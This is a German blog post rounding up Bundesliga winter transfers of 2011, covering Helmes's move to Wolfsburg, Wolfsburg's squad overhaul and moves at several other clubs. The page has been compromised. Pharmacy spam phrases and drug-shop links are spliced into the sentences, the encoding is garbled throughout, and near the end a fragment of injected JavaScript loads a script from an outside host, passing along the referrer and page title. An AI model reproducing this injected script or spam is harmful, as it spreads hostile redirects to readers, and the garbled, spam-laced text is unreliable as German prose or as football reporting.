Willkommen auf » Wintertransfers 2011 – Kurz notiert II
1. Feb 2011

Wintertransfers 2011 – Kurz notiert II

Hier also Teil 2 unseres Roundups der Transfermeldungen im Winter 2011…

### order noroxin antibiotics pills online Patrick Helmes verlA�sst den Bundesligazweiten Bayer Leverkusen nach zweieinhalb mehr oder minder erfolgreichen Jahren (mit einer ganz stattlichen Torquote von 28 Treffern in 57 Spielen). Der 26-jA�hrige wechselt fA?r 8 Millionen Euro zum VfL Wolfsburg, wo ihm ein Stammplatz und die Hoffnung auf eine RA?ckkehr in die Nationalelf winkt.

### Doch der Ex-Leverkusener ist bei den WA�lfen nur einer unter vielen neuen Gesichtern, denn VfL-Manager Dieter HoeneAY hat das Team im Winter komplett umgekrempelt: neben Edin Dzeko verlassen den Klub noch Karim Ziani, Nassim Ben Khalifa, Vlad Munteanu und Andrea Barzagli. DafA?r kommen Order Jan Polak (29, defensives Mittelfeld, fA?r 3 Mio. vom RSC Anderlecht, sammelte bereits von 2005 bis 2007 in NA?rnberg Bundesligaerfahrung), Tuncay Sanli (29, Offensiv-Allrounder, fA?r 4,5 Mio. von Stoke City, bisher 78 LA�nderspiele fA?r die TA?rkei, kam in der Premier League aber nicht zurecht, nur 20 Tore in 107 Spielen fA?r Stoke und Middlesbrough), Ja-Cheoul Koo (21, zentrales Mittelfeld, fA?r 2 Mio. aus SA?dkorea von Jeju United, 5 Tore in 6 Spielen beim Asiencup 2011) und order glucovance generic Yohandry Orozco (offensives Mittelfeld, mit 19 Jahren schon venezuelanischer Nationalspieler, fA?r 1,25 Mio. vom Zulia FC). HoeneAY erwartet vor allem von den beiden Talenten einiges, siehe Statement auf der Vereinswebsite. Und noch ein Lesetipp: Der VfLWolfsburgBlog analysiert das Transfergeschehen.

### Werder Bremen verstA�rkt sich mit dem brasilianischen Innenverteidiger Samuel Firmino de Jesus (24 Jahre, 1,90m, ablA�sefrei vom FC SA?o Paulo). a�zSamuel ist ein junger, talentierter Spieler, der sowohl als Innenverteidiger, als auch auf den AuAYenpositionen einsetzbar ist. Wir sind gespannt, wie er sich in den nA�chsten Monaten bei uns entwickeln wird“, so GeschA�ftsfA?hrer Klaus Allofs. Er erhA�lt vorerst nur einen Vertrag bis zum Sommer und wird sich bewA�hren mA?ssen.

### Edson Braafheid wechselt ablA�sefrei vom FC Bayern zu 1899 Hoffenheim. Den ghanaischen StA?rmer Prince Tagoe verleihen die Kraichgauer an Partizan Belgrad.

### Eintracht Frankfurt lA�sst buy kamagra jelly uk A?mit Korkmaz (25, ausgeliehen an den VfL Bochum, mit Kaufoption), dapoxetine usa Cenk Tosun http://pas.es/pills-for-depression-anxiety-and-moods-salon/ (19, Offensiv-Allrounder, fA?r 550.000 Euro an Gaziantepspor) und Order cheap bestinauto Markus SteinhA�fer (24, fA?r 100.000 Euro AblA�se zum FC Basel) gehen, einziger Neuzugang ist RA?ckkehrer Nikola Petkovic (24, Links-Verteidiger, war ausgeliehen an den russischen Erstligisten Tom Tomsk). Blog-G ordnet die A?berschaubaren Frankfurter TransferaktivitA�ten ein.

### Der 1.FC Kaiserslautern holt den Tschechen Adam Hlousek online (22, linkes Mittelfeld, von Slavia Prag) und den Brasilianer Lucas (19, Innenverteidiger, aus Leverkusen), jeweils auf Leihbasis mit Kaufoption.

Und nun zum Fazit: Insgesamt gaben die Bundesligisten rund 57 Millionen Euro fA?r neuen Spieler aus. Dem stehen beeindruckende 75 Millionen Euro als TransfererlA�se gegenA?ber, ein neuer Rekordwert, noch nie spA?lten Transfers im Winter mehr Geld in die Kassen der Klubs.

50 Spieler verlieAYen ihre bisherigen Vereine, 48 neue Akteure kamen hinzu. Lediglich TabellenfA?hrer Borussia Dortmund, Hannover 96 und der FC St.Pauli starten aus verschiedenen GrA?nden (Erfolg des bisherigen Kaders vs. Geldmangel) ohne NeuzugA�nge in die RA?ckrunde. Die Spitzenposition bei der Spieler-Rochade teilen sich der VfL Wolfsburg und 1899 Hoffenheim mit jeweils sechs Zu- und AbgA�ngen. Beide Klubs belegten im Winter solide RA�nge im Mittelfeld der Bundesliga, wollen aber in der zweiten SaisonhA�lfte allem Anschein nach noch einmal oben angreifen und gehen dafA?r auch finanziell in die Vollen.

Auch aus A�konomischer Sicht siegen die Wolfsburger. Trotz Ausgaben in HA�he von knapp 20 Millionen Euro kommt man unter dem Strich noch auf ein sattes Plus von 17 Millionen, verantwortlich dafA?r ist der neue Rekordtransfer der Bundesliga von StA?rmer Edin Dzeko, er wechselte im Winter fA?r ca. 35 Mio. vom VfL zu Manchester City und ermA�glichte somit eine gewisse Freiheit auf dem Transfermarkt, die Manager Dieter HoeneAY auch bereitwillig ausfA?llte.

So weit, so gut. Sind wir mal gespannt wie sich die Transfers fA?r die Vereine letztendlich auswirken, wer sich etablieren kann, wie viele Spieler im Sommer schon wieder weg sind, welche AblA�sesummen sich im Nachhinein als gerechtfertigt herausstellen werden und ob sich der ein oder andere Klub nicht doch lieber um den ein oder anderen Neuzugang hA�tte bemA?hen sollen…

Und zum Abschluss verweise ich noch auf Arnd Zeiglers komA�diantischen Pills Blick auf die „wunderbare Welt der Wintertransfers“ :)s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; http://www.annamoes.com/betnovate-price-india/ alesse birth control order online


Einen Kommentar schreiben